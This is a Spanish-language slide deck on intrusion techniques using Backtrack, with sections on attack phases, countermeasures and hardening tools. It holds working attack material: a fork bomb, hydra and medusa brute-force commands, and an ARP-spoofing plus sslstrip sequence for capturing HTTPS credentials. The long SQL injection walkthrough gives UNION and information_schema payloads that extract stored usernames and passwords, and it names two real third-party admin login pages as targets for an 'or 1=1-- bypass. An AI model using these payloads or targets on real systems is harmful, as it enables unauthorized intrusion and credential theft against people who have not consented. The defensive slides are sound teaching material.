SlideShare una empresa de Scribd logo
1 de 66
Descargar para leer sin conexión
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.

   IANUX Soluciones | Comunidad de Software
                              Libre
    http://ianux.com.ar | http://saltalug.org.ar

         LPIC Oscar Gonzalez,              Gabriel Ramirez,
              Consultor IT,               Security Consultant
          Security Researcher,
           Instructor LPI Linux

     oscar.gonzalez@ianux.com.ar      gabriel.ramirez@ianux.com.ar
     oscar.gonzalez@saltalug.org.ar
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
    Agenda:
   Seguridad Informatica
   Tecnicas de Intrusion | Hacking
   Tools | Backtrack
   Contramedidas o Hardening.
   Ejemplos
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.

   Un ataque ocurre cuando una persona o un grupo de personas
    intenta acceder, modificar o dañar un sistema o entorno.
    Estos ataques generalmente intentan lograr algunos de estos
    objetivos:
    Atacar la privacidad
    Atacar la integridad
    Atacar la disponibilidad
    Atacar la autenticidad
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.

 Las personas que atacan sistemas se ven motivadas
 por diferentes razones:
 • Por diversión o desafío.
 • Por venganza.
 • Por terrorismo.
 • Rédito económico.
 • Ventaja competitiva.
 • Poder
Tecnicas de Intrusion (Backtrack)
         y Contramedidas.
Los problemas de inseguridad actuales no se encuentran
favorecidos únicamente por usuarios maliciosos, sino que muchas
veces se encuentran ayudados por malas implementaciones de
las aplicaciones, desconocimiento, negligencia, etc.
Hemos catalogado los principales factores que pueden generar
problemas de seguridad en:

    •   Falta de políticas y/o normativas       •   Uso incorrecto de las aplicaciones

    •   Protocolos                              •   Errores en los programas

    •   Ambiente multilenguaje y                •   Errores de configuración
        multiproveedor                          •   Passwords
    •   Dispersión geográfica                   •   Falta de supervisión y/o control.
    •   Falta de actualización de software de
        base
Tecnicas de Intrusion (Backtrack)
         y Contramedidas.
Es importante conocer la forma en que proceden los intrusos para
conocer la manera de detenerlos.
En general los intrusos realizan las mismas actividades cuando
desean ingresar o atacar a un sistema, por lo que podemos
generalizar los pasos en:

     Investigación
     Penetración
     Persistencia
     Expansión
     Logro del objetivo
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.

     Siempre antes de realizar un ataque, los intrusos realizan un
I
     estudio del objetivo.
N
V
     Generalmente consiste en obtener la siguiente información:
E
S
T    ●
         Información de la empresa objetivo.
I
G
     ●
         Información del dominio objetivo: conociendo el nombre de la empresa
A        se puede obtener su información de dominio a través de consultas tipo
C
         WHOIS.
I    ●
         Información de los servidores: una vez que el intruso obtuvo el dominio,
O        puede realizar consultas NSLOOKUP para conocer cuáles son los
N        servidores que tiene la empresa.
Tecnicas de Intrusion (Backtrack)
               y Contramedidas.
        Identificación de la plataforma: uno de los principales datos
         que buscan de sus objetivos es la plataforma sobre la que trabajan
I        (Windows, Linux, Novell, etc.). Esto se puede realizar mediante la
N        utilización de técnicas de OS fingerprint | Banner Identification.
V
E
        Identificación de los servicios: otra información importante que buscan
S        obtener los atacantes son los servicios que ofrecen los servidores
T
         objetivos. Esto se puede realizar mediante escaneadores de puertos
I
         (port-scanners)
G
A
        Contramedidas:
C       Como primer contramedida, es necesario restringir la información que se
I       difundirá a través de los servicios de DNS y WHOIS.
O       También se puede incluir filtrado de paquetes, para evitar la detección de la
N       plataforma y los servicios y un Sistema de Detección de Intrusos (IDS) para
        detectar cuando se está produciendo un escaneo de puertos.
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.
     Banner Identification.
     telnet 192.168.1.1 22
     nc -v -n 192.168.27.1 22
I    wine sl.exe -v -b 192.168.27.1
N    xprobe2 192.168.27.1
V
     amap -B 192.168.27.1 80
E
     ingenieria_social -XD
S
T
     Target Enumeration
I    nmap -sS -p 139 -O -D 24.213.28.234 192.168.27.1
G    Identificación de registros / dominios
A    Sam Spade http://www.samspade.org/
C    Identificación del Sistema Operativo
     Netcraft     http://news.netcraft.com/
I
     GFI LANguard N.S.S
O    AutoScan (backtrack)
N    Scanrand scanrand -b10M -N 192.168.27.1:80,25,22,443
     rotex        http://www.robtex.com/
     maltego
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.

P
E    En esta situación el atacante intentará acceder al objetivo.
N    Para realizar este paso, utilizan diferentes técnicas:
E
T
R     
          Explotación de vulnerabilidades: existe algún producto instalado que
A         permita la ejecución de código arbitrario.
C     
          Debilidad de contraseñas: una contraseña débil puede permitir el
I
          ingreso de intrusos.
O
N     
          Servicios mal configurados: un servicio que no esté adecuadamente
          configurado puede permitir que intrusos hagan uso abusivo del mismo,
          o incluso, que ejecuten código arbitrario.
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.

P
E
     Contramedidas:
N
E    
         Explotación de vulnerabilidades: actualización constante del software
T        instalado.
R
A
     
         Debilidad de contraseñas: definir una política de contraseñas robusta.
C    
         Servicios mal configurados: revisar periódicamente la configuración de
I        los servicios.
O
N
          Como contra-medida general, siempre tenemos que tener en cuenta al
         filtrado de paquetes y la revisión periódica de los archivos de logs para
                   conocer los eventos que han sucedido en el sistema.
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.
     Una vez que un atacante ha logrado ingresar a un sistema,
     generalmente realiza actividades para evitar ser detectado y
     deja herramientas o puertas traseras en el sistema para poder
P    mantener un acceso permanente.
E    Para evitar ser detectado, en general un atacante busca los
N    archivos de auditoría o log del sistema, para borrarlos o
E    modificarlos ocultando su acceso y sus actividades. En
T    Windows NT/2000, se puede realizar borrando el contenido
R
     del Visor de Sucesos :(.
A
C
I
     Contramedidas:
     Para evitar que un intruso elimine los archivos de log, se puede optar por
O
     mantenerlos guardados fuera del lugar donde se generan.
N
     Es complicado evitar la copia de archivos, pero puede detectarse la
     modificación de ellos. Existen herramientas que crean un hash de los
     archivos de sistema, y avisan al administrador en caso de detectar una
     modificación.
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.
     Muchas veces, el objetivo final de un ataque no es
E
X
       el primer sistema atacado, sino que se utilizan
P     varios saltos intermedios para lograr realizar un
A                 ataque sin ser rastreados.
N
S
I
        Esto puede generar que nuestro sistema sea
O             víctima y a la vez sea atacante.
N
      Nuevamente, las contramedidas son el filtrado de
     paquetes, los sistemas IDS, y el control periódico de
                      los archivos de log.
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.
L
O
G
     En este punto podríamos decir que la tarea del
R    intruso ha llegado a su objetivo. A partir de aquí,
O    podemos esperar diferentes acciones por parte del
     intruso:
D
E
L    Desaparecer sin dejar rastro
     Avisar al administrador que se ha ingresado al
O    sistema
B
J
     Comentar los fallos de seguridad encontrados a sus
E    colegas
T    Hacer públicos los fallos de seguridad
I
V
O
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.


 Como vimos anteriormente, la seguridad debe proveer:
 1) integridad,
 2) disponibilidad y
 3) confidencialidad de la información.

 Un ataque puede tener diferentes efectos:
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.


  Nos referimos a INTERCEPTACION cuando un usuario no
  autorizado obtiene acceso a la información.

  Ataques de interceptación:

  Eavesdropping (Sniffing| AIRSniffing | War Driving y
  Netstumbling | Desbordamiento de CAM | VLAN hopping |
  STP manipulation)
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.

  En un ataque por MODIFICACION, un usuario malicioso
  generalmente obtiene acceso no autorizado a un recurso
  con los privilegios necesarios para cambiarlo. Modificar un
  flujo de datos en una transmisión de red o archivos en un
  servidor pueden ser ejemplos de estos ataques.

  Ataques de modificación:

  Man-in-the-Middle (DHCP Starvation|
  Manipulación de datos
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
La INTERRUPCION consiste en dañar o dejar sin
funcionamiento un sistema completo o parte de éste.
Si bien la detección es inmediata, los daños ocasionados por
la suspensión del servicio y el tiempo de recuperación pueden
ser muy importantes.
  Ataques de interrupción:

   Denegación de Servicio
   Denegación de Servicio Distribuida
   Falla de dispositivos o Software. (bombas logicas :(){ :|:& };:)
   Desastres Naturales (incendios, inundaciones,
                         catástrofes naturales, etc)
   Daños intencionales o no, ( ya sea por negligencia,
                               descuido o ignorancia).
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.


La FALSIFICACION puede aplicarse a la creación de nuevos
objetos dentro del sistema, o simplemente participar en una
conversación simulando ser otro interlocutor.


   Ataques de falsificación:

   IP Spoofing
   MAC Address Spoofing
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.

El RECONOCIMIENTO es el descubrimiento no
autorizado de la topología de la red, sus sistemas,
servicios o vulnerabilidades.
 Para realizar cada paso del reconocimiento de una red, existen
 numerosas herramientas o alternativas. Algunas herramientas ya integran
 toda la secuencia de pasos: detectan los hosts alcanzables en una red, y
 por cada uno de estos realizan una búsqueda de sus servicios y
 vulnerabilidades.

 Una alternativa para evitar el descubrimiento es establecer filtros de
 tráfico. El filtrado de tráfico puede actuar como una barrera que impida los
 paquetes ICMP echo (generalmente utilizados en la primer fase del
 descubrimiento).
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.


La FALSIFICACION puede aplicarse a la creación de nuevos
objetos dentro del sistema, o simplemente participar en una
conversación simulando ser otro interlocutor.


   Ataques de falsificación:

   IP Spoofing
   MAC Address Spoofing
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.

El RECONOCIMIENTO es el descubrimiento no
autorizado de la topología de la red, sus sistemas,
servicios o vulnerabilidades.
 Para realizar cada paso del reconocimiento de una red, existen
 numerosas herramientas o alternativas. Algunas herramientas ya integran
 toda la secuencia de pasos: detectan los hosts alcanzables en una red, y
 por cada uno de estos realizan una búsqueda de sus servicios y
 vulnerabilidades.

 Una alternativa para evitar el descubrimiento es establecer filtros de
 tráfico. El fltrado de tráfico puede actuar como una barrera que impida los
 paquetes ICMP echo (generalmente utilizados en la primer fase del
 descubrimiento).
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.
    Código Malicioso / Virus
   Se define como todo programa o fragmento del mismo que genera algún tipo de
    problema en el sistema en el cual se ejecuta, interfiriendo de esta forma con el normal
    funcionamiento del mismo. Existen diferentes tipos de código malicioso:
   Bombas lógicas: Se encuentran diseñados para activarse ante la ocurrencia de un evento
                   definido en su lógica.
   Troyanos: Suele propagarse como parte de programas de uso común y se activan cuando los mismos
              se ejecutan.
   Gusanos: Tienen el poder de autoduplicarse causando efectos diversos.
   Cookies: Son archivos de texto con información acerca de la navegación efectuada por el usuario en
             Internet e información confidencial del mismo que pueden ser obtenidos por atacantes.
   Keyloggers: Es una aplicación destinada a registrar todas las teclas que un usuario tipea en su
    computadora; algunos de ellos además registran otro tipo de información útil para un atacante, como
    ser, imágenes de pantalla.
   Spyware: Aplicaciones que recogen y envían información sobre las páginas web que más
    frecuentemente visita un usuario, tiempo de conexión, datos relativos al equipo en el que se encuentran
    instalados (sistema operativo, tipo de procesador, memoria, etc.) e, incluso, hay algunos diseñados para
    informar de si el software que utiliza el equipo es original o no.
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.

 Resumen
 1: Introducción
 2: Footprinting e Ingeniería Social
 3: Escaneo y Enumeración
 4: SystemHacking
 5: Malware (Troyanos, Backdoors, Virus & Gusanos)
 6: Sniffers (MITM..)
 7: Denegación de Servicio y Hijacking de Sesión
 8: Web Hacking
 9: Wireless Hacking
 10:Craking
 11: Seguridad Física
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
 Que herramientas necesitamos?




                Backtrack | Samurai | WifiSlax
            Cabezota | Paciencia | Estudiar | Leer
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
 Tools




 nmap | meduza | hydra | tsgrinder | Pwdump| john | ettercap |
   sslstrip | metasploit | UCSniff| Nessus | Telnet Evilgrade|
  Fasttrack| Paros|BeEF|DSniff|Samurai|WifiSlax|SQLNinja|
  Xssploit|WebShag|aircrack-ng|kismet|kismac|La Cabeza|..
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
 Bruteforce Tool: Meduza | hydra | TSGrinder


 medusa -h 192.168.198.133 -u root -P password -M ssh

 hydra -l admin -P /pentest/passwords/wordlists/darkc0de.lst -e
 ns -t 15 -f -s -vV 192.168.1.1 http-get /

 medusa:
 -h: Dirección IP objetivo (host)
 -u: Usuario (en este caso root)
 -P: Archivo contenedor de contraseñas (puede asignarse la ruta completa
 de ubicación de este archivo, ej. /root/Desktop/carpeta/passwords.txt)
 -M: Módulo de ejecución de medusa, para este caso ssh (Secure Shell)
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
 Sin SSL ¿Y Ahora Quien Podrá Defendernos?




 Mini Taller 1: Asegurar utilizando SSL o cifrado a
 nuestras comunicaciones no siempre es la mejor opción.
Tecnicas de Intrusion (Backtrack)
        y Contramedidas.

Que es ettercap?
Que es ARP?
Que es MITM?
Que es SSLStrip?
Que es un Fake SSL Attack?
Que es un Null Prefix Attack SSL?
Como funciona, todo esto?
Algunos consejos para defendernos
Tecnicas de Intrusion (Backtrack)
          y Contramedidas.

Que es ettetcap?
es un interceptor/sniffer/registrador para LANs con switch. Soporta direcciones activas
y pasivas de varios protocolos (incluso aquellos cifrados, como SSH y HTTPS).
También hace posible la inyección de datos en una conexión establecida y filtrado al
vuelo aun manteniendo la conexión sincronizada gracias a su poder para establecer un
Ataque Man-in-the-middle(Spoofing). Muchos modos de sniffing fueron implementados
para darnos un conjunto de herramientas poderoso y completo de sniffing.

Que es el ARP?
El protocolo ARP es un protocolo de capa 3 utilizado para traducir direcciones IP (por
ejemplo: 192.168.1.1) a direcciones físicas de tarjeta de red , direcciones MAC (por
ejemplo: 0fe1.2ab6.2398).
Tecnicas de Intrusion (Backtrack)
         y Contramedidas.

Ejemplo de una red,   EL ANTES :)
Tecnicas de Intrusion (Backtrack)
          y Contramedidas.
Que es el MITM?
En criptografía, un ataque man-in-the-middle (MitM o intermediario)
es un ataque en el que el enemigo adquiere la capacidad de leer,
insertar y modificar a voluntad, los mensajes entre dos partes sin que
ninguna de ellas conozca que el enlace entre ellos ha sido violado.
El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas.

Ejemplo de una red Infectada,    EL DESPUES XD
Tecnicas de Intrusion (Backtrack)
          y Contramedidas.

Que es SSL & TLS?
SSL stands for Secure Sockets Layer, though I.E.T.F. (Internet Engineering Task
Force) has renamed it TLS (Transport Layer Security). TLS is documented in RFC 2246
and identifies itself in the protocol version field as SSL 3.1.

De donde viene SSL/TLS come from?
SSL was developed by Netscape, and is used extensively by web browsers & crawlers
to provide secure connections for transferring sensitive data, such as credit card
numbers and login authentication. An SSL-protected HTTP transfer uses trusted port
443 (instead of HTTP's normal port 80), and is identified with a special URL method
”https.” Thus, https://mail.google.com/ would cause an SSL-enabled browser to open a
secure SSL session to trusted port 443 at mail.google.com.
Tecnicas de Intrusion (Backtrack)
          y Contramedidas.

Puertos Seguros o ”Trusted Ports?”
This is one of the first security patterns implemented on the internet, via ”r” or remote
programs. The idea is that all ports below 1024 were assigned ONLY to system
processes. This means remote connections were trusted because if the port was below
1024 it was a system process and not a user/client. This affects layer 4 ”Transport” of
the OSI-Model and the protocols involved were TCP and UDP. It should be noted that
this is an old process for security that modern encryption has replaced via SSH.

Que es SSLStrip?
Es una tool que nos permite sniffar usuarios y contraseñas encriptadas en HTTPS.
Esto lo hace realizando un ataque MITM entre el servidor y nuestro objetivo
conectandose al servidor mediante HTTP (sin encriptar) en lugar de HTTPS
(encriptado) con lo que los datos son visibles.
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
 Como funciona SSLStrip?
Tecnicas de Intrusion (Backtrack)
          y Contramedidas.
      Manos a la Obra XD


nmap -sC -O 192.168.27.0/24
cat /proc/sys/net/ipv4/ip_forward
echo "1" > /proc/sys/net/ipv4/ip_forward
Redirige el trafico proveniente del puerto 80 al 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports
8080
ARP MITM
arpspoof -i eth0 -t 192.168.27.199 192.168.27.1
python sslstrip.py -a -l 8080 -w captura
tail -f captura (Esperando a las víctimas)
Tecnicas de Intrusion (Backtrack)
         y Contramedidas.

Como nos defendemos?
Plugging Firefox http://enigform.mozdev.org/
                      https://www.eff.org/https-everywhere
                      Greasemonkey + script redirect https
                      NoScript + Config https
Entradas estaticas no ARP (arp -s [ip_address] [mac_address])
Port Security:
ARP Watch
Estando atentos! (arp -a)
IDS/IPS para detectar el Poisoning


     Recordar siempre: “Las contraseñas son como la ropa interior,
       debemos cambiarlas de tanto en tanto y nunca debemos
                           compartirlas!!!”
Tecnicas de Intrusion (Backtrack)
          y Contramedidas.
Greasemonkey + script redirect https
// ==UserScript==
// @name        https Link Rewriter for Facebook.com
// @namespace       http://not.existant
// @description Rewrites the facebook.com links to use https. Created by Brian Quan
// @version      1.1
// @include     http://*.facebook.com/*
// @include     https://*.facebook.com/*
// ==/UserScript==



var allLinks = document.getElementsByTagName('a');

for(var i=0; i < allLinks.length; i++) {
  // check if the link href matches pattern
      allLinks[i].href = allLinks[i].href.replace('http://www.facebook.com','https://www.facebook.com');
      allLinks[i].href = allLinks[i].href.replace('http://apps.facebook.com','https://apps.facebook.com');
}

var allLinks2 = document.getElementsByTagName('form');

for(var i=0; i < allLinks2.length; i++) {
     allLinks2[i].action = allLinks2[i].action.replace('http://www.facebook.com','https://www.facebook.com');
     allLinks2[i].action = allLinks2[i].action.replace('http://apps.facebook.com','https://apps.facebook.com');
}
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.


          Fake certificate? Null prefix attack?

  Si nos creamos nuestro propia CA? Spoof certificate?

                 *0.midominio.com.ar
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
              Herramientas Open Source para
                   Segurizar Plataformas
 http://forkbomb.org/ninja/
 Grsecurity (Kernel)
 Mod-Security (Apache)
 BSD (Firewalls Front End)
 Ossim (Monitoreo)
 Cacti/Nagios/Zabbix (Monitoreo)
 Auth2DB (Centralización de logs)
 SSL
 Kerberos (MIT)
 Snort
 Fail2Band
 Cabezota!
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                       SQL Injection




      Sin lugar a dudas esta técnica es una de las mas
  peligrosas que hay en una aplicación, ya sea WEB o de
   Escritorio, por la potencia que tiene y la capacidad de
   poder ingresar a un sistema de una forma eficaz. Por
 practica puedo decir que es una de las vulnerabilidad mas
     comunes y una de las mas versátiles a la hora de
                    pentestar un sistema =)
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                     SQL Injection



                                Según Wikipedia:
  "Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las
 entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las
 variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error
 de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje
            de programación o de script que esté incrustado dentro de otro.
 Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro
   código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el
                              código "invasor" en la base de datos."

     Hablando en criollo son variables no sanadas o filtradas
     incluidas en querys pudiendo este introducir comandos
         arbitrarios q luego seran interpretados por la DB
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                         SQL Injection




                     SEGUN WIKIPEDIA

  bypass– se refiere, en general, a una ruta alternativa a otra
                           normal.
   Bypass, en hacking, forma de esquivar un sistema de
  seguridad informático; o también enfoque distinto para
           solucionar un problema informático
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                   SQL Injection

                   Este es un panel echo a proposito con este bug




  Estas son las lineas del bug: Aqui lo que pasa por el formulario, el usuario y password
    lo llevamos a la variable $usuario y $password, luego automaticamente sin colocar
                       alguna seguridadlo vuelca a la consulta SQL.
   Si yo colo como nombre admin y password 123456, la consulta arrojara un TRUE y
 traeria datos de la base de datos ya que para el usuario admin el password es 123456.
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                          SQL Injection


 Nota: los string en msql son delimitados por comillas simples (') entonces
 nosotros para poder inyectar tendremos q escaparnos o cerrar esta comilla
 simple.

 SELECT * FROM usuarios WHERE usuario=''' AND password=''

 como vemos en el campo usuarios hay 3 comillas simples las 2 de afuera son del
 programador y las del medio la nuestra .
 Esto arrojaria un error, en este caso seria el siguiente

 Error en la Consulta: SELECT * FROM usuarios WHERE usuario=''' AND password=''Error en la
 consultaYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server
 version for the right syntax to use near '''' AND password=''' at line 1

 Aqui mysql esta diciendo especificamte q hay una comilla simple sin cerrar =) eto es loq aprovechamos
 nosotros
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                   SQL Injection

 Para bypasear el login facilmete sin saber el usuario y pasword podemos ingresar 'or
 1=1-- . Esto lo q ahce es ingresar con el primer rejistro de nuestra tabla Usuarios.
 Para que se entienda mejor:

 SELECT * FROM usuarios WHERE usuario='' AND password=''or 1=1-- '

 La comilla ingresada por nosotros cierra la primera comilla simple. Luego de cerrar
 podemos proceder a colocar nuestras sentencias.
 or 1=1 la sentencia or significa que si algo es verdadero entonces todo es verdadero, y
 como 1=1 es verdadero entonces toda nuestra consulta sera verdadera por mas que
 no hallamos dicho el usuario es igual a ''. Or se comporta de esta forma.
 1- V or V = Verdadero
 2- V or F = Verdadero
 3- F or V = Verdadero *
 4- F or F = Falso
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                    SQL Injection




 'or 1=1--
 ' = La Comilla ingresada por nosotros cumple la funcion de cerra la del programador.
 or 1=1 = La sentencia or significa q si algo es vedadero y en este caso segun el
 comportamiento de or 1=1 todo es verdadero.


 — = En SQL significa comentario, por loq encontonces todo lo q bien depues se lo toma
 com comentario
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                      SQL Injection




 http://www.specsdirect2u.co.uk/admin/admin_login.php
 'or 1=1--

 http://www.faba7.org.ar/adm/inicio.asp
 ' OR 1=1--
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                    SQL Injection


 Como reconoser una web bulnerable?

  Agregando comilla simple ('), ")", ''/*'' , ''--'' o "#" al final del balor de la variable ej

  http://webvuln.com/archvo.php?id=1'
  http://webvuln.com/archvo.php?id=1)

  Se pude intentar con palabras del lenguaje sql como "select,order by" etc
  Y con opeadores logicos 1 and 1=1 , 1 and 1=2

  "You have an error in your SQL syntax; check the manual that " o algo parecido ..
  sabemos que es vulnerable a sql injection.
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                        SQL Injection




 Agregado operadores logicos
  1 && 1 //Representa el AND
   1 || 1 //Representa el OR
   1 XOR 0 //Retorna null si alguno de ellos es null
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                               SQL Injection



 Lo primero q hacemos es sacar el numero de columnas
  Com hacemos esto? usando order by o union select

  http://webvuln.com/vuln.php?id=-1 order by 1/* <---- no muestra un error
  http://webvuln.com/vuln.php?id=-1 order by 2/* <---- no muestra un error
  http://webvuln.com/vuln.php?id=-1 order by 15/* <-------- no muestra un error
  http://webvuln.com/vuln.php?id=-1 order by 16/* <-------- no muestra un error
  http://webvuln.com/vuln.php?id=-1 order by 17/* <-------- error
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                         SQL Injection


  Ahora buscaremos la columna q printee las
  respuestas de nuestra inyeccion, generalemte los nu-
  meros q aprecen son los q printean

  Bien supongamos q en la web nos aparecio el numero 3 entonses para
  estar seguros hacemos lo siguiente

  index.php?id=-1+UNION+ALL+SELECT+1,2,version(),4--

  esto nos devolveria com resultado la version de la db, este es un dato
  importante porq dependiendo de la version varia el ataque.
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                    SQL Injection



Informacion Util

version ()      : Devuelve la versión del servidor MySQL.
database()       : Devuelve el nombre de la base de datos actual.
current_user() : Devuelve el nombre de usuario y el del host para el que está autentificada la
                   conexión actual. Este valor corresponde a la cuenta que se usa para evaluar los
                   privilegios de acceso. Puede ser diferente del valor de USER().
last_insert_id() : Devuelve el último valor generado automáticamente que fue insertado en una
                    columna AUTO_INCREMENT.
connection_id() : Devuelve el ID de una conexión. Cada conexión tiene su propio y único ID.
@@datadir directorio de la db.
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                   SQL Injection




NOTA:
          El soporte para INFORMATION_SCHEMA está disponible en MySQL 5.X.X y posterior.
Proporciona acceso a los metadatos de la base de datos.

            Metadatos son datos acerca de los datos, tales como el nombre de la base de datos o tabla,
el tipo de datos de una columna, o permisos de acceso. Otros términos que a veces se usan para esta
información son diccionario de datos o catálogo del sistema .
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                             SQL Injection


INFORMATION_SCHEMA SCHEMATA proporciona información acerca de db.
INFORMATION_SCHEMA TABLES proporciona información de las tablas en las db.
INFORMATION_SCHEMA COLUMNS proporciona información de las columnas en las db.
INFORMATION_SCHEMA STATISTICS proporciona información acerca de los índices de las tablas.
INFORMATION_SCHEMA USER_PRIVILEGES proporciona información acerca de permisos globales.
INFORMATION_SCHEMA SCHEMA_PRIVILEGES proporciona información acerca del esquema de permisos
INFORMATION_SCHEMA TABLE_PRIVILEGES proporciona información de permisos de tablas.
INFORMATION_SCHEMA COLUMN_PRIVILEGES proporciona información acerca de permisos de columnas.
INFORMATION_SCHEMA CHARACTER_SETS proporciona información acerca de los caracteres disponibles.
INFORMATION_SCHEMA COLLATIONS proporciona información acerca de colaciones para cada conjunto de caracteres.
INFORMATION_SCHEMA COLLATION_CHARACTER_SET_APPLICABILITY indica qué conjunto de caracteres es aplicable a cada
colación.
INFORMATION_SCHEMA TABLE_CONSTRAINTS describe qué tablas tienen restricciones.
INFORMATION_SCHEMA KEY_COLUMN_USAGE describe qué columnas clave tienen restricciones.
INFORMATION_SCHEMA ROUTINES proporciona información acerca de rutinas almacenadas (procedimientos y funciones).
INFORMATION_SCHEMA VIEWS proporciona información acerca de las vistas en las bases de datos.
INFORMATION_SCHEMA TRIGGERS proporciona información acerca de disparadores.
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                    SQL Injection



Exploramos las tablas con la funcion information_schema
 La sintaxis seria la siguiente
 .php?id=-1+union+select+1,2,3,4,5+from+information_schema.tables--
 Ahora pedimos el tablename pero para esto tenemos que encontrar la columna vulerable

 .php?id=-1+union+select+table_name,2,3,4,5+from+information_schema.tables--
 .php?id=-1+union+select+1,table_name,3,4+from+information_schema.tables--
 .php?id=-1+union+select+1,2,table_name,4+from+information_schema.tables--
 .php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables--

 primera tabla es CHARACTER_SETS
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
                                  SQL Injection


 Ahora navegamos por las tablas, para esto agergamos
     +limit+1,1-- al final de la inyeccion q tenemos
           -1+union+select+1,2,table_name,4+from+information_schema.tables+limit+1,1--


 cambiando el valor del limit vamos sacando los nombres de las tablas
    .php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+1,1--
                                        COLLATIONS
    .php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+2,1--
                       COLLATION_CHARACTER_SET_APPLICABILITY
        -1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+3,1--
                                          COLUMNS
Tecnicas de Intrusion (Backtrack)
         y Contramedidas.
                                   SQL Injection



Ya exploramos todas las tablas y tenemos los nombres, ahora elejimos la que cosideremos
importante por ejeplo usuarios.
Vamos a ver las columas q tiene dicha tabla, esto se logra practicamte como lo hicimos con las
columnas anteriormente pero ahora usaremos el information_schema.columns y le diremos que nos
de las columnas de usuarios, lo aremos de la siguiente manera


http://web.com/vuln.php?id=-
1+union+select+1,2,column_name,4,5+from+information_schema.c
olumns+where+table_name=char(85,115,117,97,114,105,111,115)
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.
            SQL Injection
Tecnicas de Intrusion (Backtrack)
          y Contramedidas.
                                              SQL Injection


Aqui la explicacion
+where+table_name=char(85,115,117,97,114,105,111,115)
where ( donde )
table_name ( nombre de la tabla )
char(85,115,117,97,114,105,111,115) es el nombre de la tabla Usuarios en ASCII
85 =U
115=s
117=u
97 =a
114=r
105=i
111=o
115=s

lista de valores en asii http://www.ascii.cl/es/
Tecnicas de Intrusion (Backtrack)
         y Contramedidas.
                                      SQL Injection


Hacemos lo mismo agregamos el limit y vamos scando las columnas de
la tabla users
.php?id_rubro=-
1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=char(85,115,117,97,
114,105,111,115)

.php?id=-
1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=char(85,115,117,97,
114,105,111,115)+limit+2,1--

.php?id=-
1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=char(85,115,117,97,
114,105,111,115)+limit+3,1--
+limit+2,1--
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.
                                                      SQL Injection


Ya tenemos las tablas y las columnas ahora usaremos la funcion
concat_ws que concatena las columnas para extraer sus datos

Nos quedaria algo asi:
php?id=-1+union+select+1,2,concat_ws(0x3a,Usser,Pass,email_usuario),4,5+from+Usuarios
.


En el caso q exista mas de un usuario se agrega nuevamte el limit para navegar entre ellos



nota: el primer 0x3a es el codigo Hexadecimal de el caracter : asi con eso separamos los datos
Tecnicas de Intrusion (Backtrack)
           y Contramedidas.
                                                      SQL Injection


Ya tenemos las tablas y las columnas ahora usaremos la funcion
concat_ws que concatena las columnas para extraer sus datos

Nos quedaria algo asi:
php?id=-1+union+select+1,2,concat_ws(0x3a,Usser,Pass,email_usuario),4,5+from+Usuarios
.


En el caso q exista mas de un usuario se agrega nuevamte el limit para navegar entre ellos



nota: el primer 0x3a es el codigo Hexadecimal de el caracter : asi con eso separamos los datos
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.



Tools
 GIE
 Sqlimput
 Metasploit
 SQLix
 SQLi Scanner by f-security
Tecnicas de Intrusion (Backtrack)
